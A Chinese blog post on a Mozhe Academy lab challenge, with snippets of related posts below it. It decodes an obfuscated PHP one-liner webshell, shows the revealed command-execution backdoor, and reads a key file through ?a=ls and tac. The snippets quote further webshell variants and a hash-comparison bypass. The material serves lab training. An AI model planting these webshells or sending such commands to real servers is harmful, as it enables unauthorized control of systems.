墨者学院-php代码分析溯源

最新推荐文章于 2023-07-17 16:32:37 发布
最新推荐文章于 2023-07-17 16:32:37 发布
阅读量345 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/85006708
版权

打开发现代码是base64+压缩的编码

最简单的方式是将eval变成echo,其他方法

得到echo `$_REQUEST[a]`;; ?>

构造payload:?a=ls,发现key文件

 

用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents

两种方法:

1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-source:

2.使用tac直接读取出来,得到key

0ne_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者学院-php分析溯源
JimWu的博客
09-04 333
php分析溯源 难易程度:★★ 题目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载源码。 2.打开文件夹,发现shell.php。 3.打开文件,发现一句话木马。 参数a的值给md5加密了,解密后为1Q2W3E。 3个=为全等,不仅比较值,而且还比较值的类型。 4.打开菜刀连接,构造url为 http://219.153.49.228:47779/shell.php?a...
墨者学院 PHP代码分析溯源(第4题) 详解
永远是少年
12-11 736
今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题)。 一、题目简介 二、破解源码 三、命令执行拿到key
溯源(一)之溯源的概念与意义
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-20 3033
我们大家都知道护网,攻防演练,每年的护网在招聘的时候都分初级,中级和高级,初级负责看监控设备,上报攻击流量,中级是负责研判,通俗一点就是确定攻击是不是恶意的或者这个警告是不是误报,那高级就是负责溯源攻击的IP是来自哪里的溯源就是根据已有的线索,攻击方式以及攻击特征等通过技术手段反查攻击者身份或是组织信息,在我们日常接触的项目中,也都需要我们去掌握这一项技能,比如客户的服务器出现了,我们需要去排查,去溯源漏洞或者病毒文件的位置,去保障客户的网络安全,是学安全方向上的人才必须掌握的一项技能。
日志溯源-入门
m0_49577923的博客
09-21 3137
日志溯源就是根据系统或者容器中的日志进行分析,可以了解到攻击者的攻击时间、ip、浏览器信息,计算机信息等,进而分析攻击者的攻击行为,攻击路径,攻击方法。日志溯源分为网站日志溯源和系统日志溯源。可以通过分析得到的(真实的)ip进行溯源攻击者,分析攻击者对网站进行的操作猜解网站存在的漏洞以及攻击者的攻击方式,然后利用工具或者手工排查存在的可疑文件,并且进行删除。
溯源分析总结
akdjfhx的博客
07-17 459
溯源分析总结
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
PHP代码分析溯源(第1题)
mozhe_的博客
05-25 1639
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
13.溯源分析(寻找攻击目标,警方破案)
07-21 1230
找到在哪里,干了什么,这类的领域(警方破案) 有一天在服务器上发现三个莫名的文件如下。 如果服务器本来就没有这几个文件,说明已经被入侵了。 打开image.php看一下源码 熟悉的人,一看就会发现攻击手段:1.通过phpmyadmin弱口令日志getshell phpmyadmin通过日志拿shell 攻击手段只需要这三句...
网络安全篇:IP溯源的原理及方法
m0_59162248的博客
07-04 5307
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。溯源方式:在攻击者入侵蜜罐时,蜜罐可以记录攻击者的入侵行为,获取攻击者的主机信息、浏览器信息、甚至是真实 IP及社交信息。溯源案例:样本分析过程中,发现攻击者的个人ID和QQ,成功定位到攻击者。
墨者学院 - PHP代码分析溯源(第4题)
多崎巡礼的博客
08-05 1074
打开发现提示key在根目录,且给出代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?>  这是base64加密+压缩的编码 简单方法就是直接把eval改成echo输出 执行<?php echo(gzinflate(base64_decode(‘...
墨者PHP代码分析溯源(第4题)题解
zr1213159840的博客
01-16 613
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
墨者学院 - PHP代码分析溯源(第2题)
多崎巡礼的博客
07-30 1235
根据题干看了好久的php隐式转换。。。 还是毫无头绪。。。 这样的逻辑几乎是无解的。。。 md5(QNKCDZO,32) = 0e830400451993494058024219903391   根据PHP Hash比较存在缺陷 http://www.freebuf.com/news/67007.html 。。。在这道题中,最重要的一句话就是: 根据php的隐式转换可以知道 o...
墨者 - PHP代码分析溯源(第1题)
吃肉唐僧的博客
07-12 581
进入环境,发现是php源码 用在线php代码调试工具调试(要用echo输出,将${$__}[!$_](${$___}[$_]);删掉,否则报错) 结合输出,${$__}[!$_](${$___}[$_]); 的意思大概是 <?php $_GET[0]($_POST[1])?> 这是php一句话木马的变种 其他更多变种参考:https://blog.csdn.net/x...
墨者学院 - PHP代码分析溯源(第3题)
多崎巡礼的博客
08-03 671
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
墨者学院sql注入 x-f
最新发布
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值